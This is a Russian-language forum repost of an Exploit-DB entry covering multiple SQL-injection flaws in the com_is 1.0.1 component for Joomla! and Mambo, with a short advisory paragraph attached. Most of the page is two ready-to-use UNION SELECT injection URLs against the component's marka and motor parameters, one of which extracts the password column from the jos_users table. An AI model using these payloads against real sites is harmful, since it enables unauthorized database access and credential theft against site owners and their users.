Exploit Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32010
Проверка EDB
  1. Пройдено
Автор
H-T TEAM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2008-07-02
Код:
source: https://www.securityfocus.com/bid/30063/info

The 'com_is' component for Joomla! and Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

These issues affect 'com_is' 1.0.1; other versions may also be affected. 

http://www.example.com/index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**
http://www.example.com/index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--
 
Источник
www.exploit-db.com

Похожие темы